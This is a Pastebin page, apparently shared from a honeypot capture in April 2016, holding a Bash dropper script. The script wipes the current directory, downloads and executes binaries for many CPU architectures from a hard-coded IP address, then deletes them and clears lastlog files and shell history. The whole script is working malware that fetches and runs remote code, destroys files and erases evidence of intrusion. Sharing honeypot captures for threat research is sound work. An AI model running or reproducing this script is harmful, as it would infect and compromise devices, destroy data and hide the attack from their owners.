Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-04-17 16:48

Apr 17th, 2016
159
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.42 KB | None | 0 0
  1. #!/bin/bash
  2. rm -f * armv4l armv5l armv6l armv7l i586 i686 m68k mips mipsel sh4 x86_64 powerpc poo.sh
  3. wget -q http://46.101.16.226/armv4l || busybox wget -q http://46.101.16.226/armv4l || curl -s -O http://46.101.16.226/armv4l || busybox curl -s -O http://46.101.16.226/armv4l
  4. wget -q http://46.101.16.226/armv5l || busybox wget -q http://46.101.16.226/armv5l || curl -s -O http://46.101.16.226/armv5l || busybox curl -s -O http://46.101.16.226/armv5l
  5. wget -q http://46.101.16.226/armv6l || busybox wget -q http://46.101.16.226/armv6l || curl -s -O http://46.101.16.226/armv6l || busybox curl -s -O http://46.101.16.226/armv6l
  6. wget -q http://46.101.16.226/armv7l || busybox wget -q http://46.101.16.226/armv7l || curl -s -O http://46.101.16.226/armv7l || busybox curl -s -O http://46.101.16.226/armv7l
  7. wget -q http://46.101.16.226/i586 || busybox wget -q http://46.101.16.226/i586 || curl -s -O http://46.101.16.226/i586 || busybox curl -s -O http://46.101.16.226/i586
  8. wget -q http://46.101.16.226/i686 || busybox wget -q http://46.101.16.226/i686 || curl -s -O http://46.101.16.226/i686 || busybox curl -s -O http://46.101.16.226/i686
  9. wget -q http://46.101.16.226/m68k || busybox wget -q http://46.101.16.226/m68k || curl -s -O http://46.101.16.226/m68k || busybox curl -s -O http://46.101.16.226/m68k
  10. wget -q http://46.101.16.226/mips || busybox wget -q http://46.101.16.226/mips || curl -s -O http://46.101.16.226/mips || busybox curl -s -O http://46.101.16.226/mips
  11. wget -q http://46.101.16.226/mipsel || busybox wget -q http://46.101.16.226/mipsel || curl -s -O http://46.101.16.226/mipsel || busybox curl -s -O http://46.101.16.226/mipsel
  12. wget -q http://46.101.16.226/sh4 || busybox wget -q http://46.101.16.226/sh4 || curl -s -O http://46.101.16.226/sh4 || busybox curl -s -O http://46.101.16.226/sh4
  13. wget -q http://46.101.16.226/x86_64 || busybox wget -q http://46.101.16.226/x86_64 || curl -s -O http://46.101.16.226/x86_64 || busybox curl -s -O http://46.101.16.226/x86_64
  14. wget -q http://46.101.16.226/powerpc || busybox wget -q http://46.101.16.226/powerpc || curl -s -O http://46.101.16.226/powerpc || busybox curl -s -O http://46.101.16.226/powerpc
  15. chmod 777 * || busybox chmod 777 *
  16. ./armv4l || ./armv5l || ./armv6l || ./armv7l || ./i586 || ./i686 || ./m68k || ./mips || ./mipsel || ./sh4 || ./x86_64 || ./powerpc
  17. rm -f * armv4l armv5l armv6l armv7l i586 i686 m68k mips mipsel sh4 x86_64 powerpc poo.sh
  18. >/var/log/lastlog
  19. >/etc/lastlog
  20. rm -f ~/.bash_history
  21. history -c
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement